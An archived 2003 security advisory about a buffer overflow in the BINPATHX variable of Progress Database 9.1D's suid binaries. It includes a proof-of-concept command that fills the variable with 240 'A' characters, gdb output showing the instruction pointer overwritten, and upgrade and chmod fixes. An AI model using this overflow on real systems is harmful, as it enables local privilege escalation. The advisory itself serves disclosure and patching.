Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: a6160.htm

Progress Database unchecked buffer in BINPATHX leads to overflow
16th Apr 2003 [SBWID-6160]

	Progress Database unchecked buffer in BINPATHX leads to overflow


	v9.1D up to 9.1D05


	In  Secure  Network  Operations,  Inc.  Strategic  Reconnaissance   Team
	advisory SRT2003-04-15-1029 []:
	With version 9.1D several things have changed in the Progress  codebase.
	One such change is the addition of the BINPATHX variable. At  the  first
	glance the BINPATHX variable appears to tell Progress binaries where  to
	find shared library files and other  installation  files.  Unfortunately
	while reading the variable no bounds checking is done.  If  an  attacker
	supplies enough data an overflow will occur  thus  overwriting  critical
	memory registers including the eip.
	Debugger output
	rootme@gentoo rootme $ export BINPATHX=`perl -e 'print "A" x 240'`
	rootme@gentoo rootme $ gdb -q /usr/dlc/bin/_proapsv
	(gdb) r
	Starting program: /usr/dlc/bin/_proapsv
	Program received signal SIGSEGV, Segmentation fault.
	0x41414141 in ?? ()
	(gdb) bt
	#0  0x41414141 in ?? ()
	Cannot access memory at address 0x41414141


	install 9.1D05 or chmod -s all suid binaries

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH